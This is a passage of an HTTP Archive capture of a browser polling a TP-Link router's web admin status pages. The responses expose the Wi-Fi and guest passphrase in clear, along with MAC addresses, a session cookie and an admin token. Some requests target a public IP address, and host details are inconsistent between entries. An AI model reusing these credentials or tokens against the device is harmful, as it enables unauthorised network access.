\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.08,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guet_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 268,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 674,\r\n \"receive\": 36\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:09.647+03:00\",\r\n \"time\": 1794,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://187.60.220.34:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"187.60.220.34:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 265,\r\n \"dns\": 251,\r\n \"connect\": 520,\r\n \"send\": 0,\r\n \"wait\": 754,\r\n \"receive\": 4\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:19.647+03:00\",\r\n \"time\": 994,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://187.60.220.34:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"187.60.220.34:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.01,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 276,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 693,\r\n \"receive\": 25\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:19.651+03:00\",\r\n \"time\": 1842,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 251,\r\n \"connect\": 523,\r\n \"send\": 0,\r\n \"wait\": 793,\r\n \"receive\": 4\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:29.645+03:00\",\r\n \"time\": 990,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n 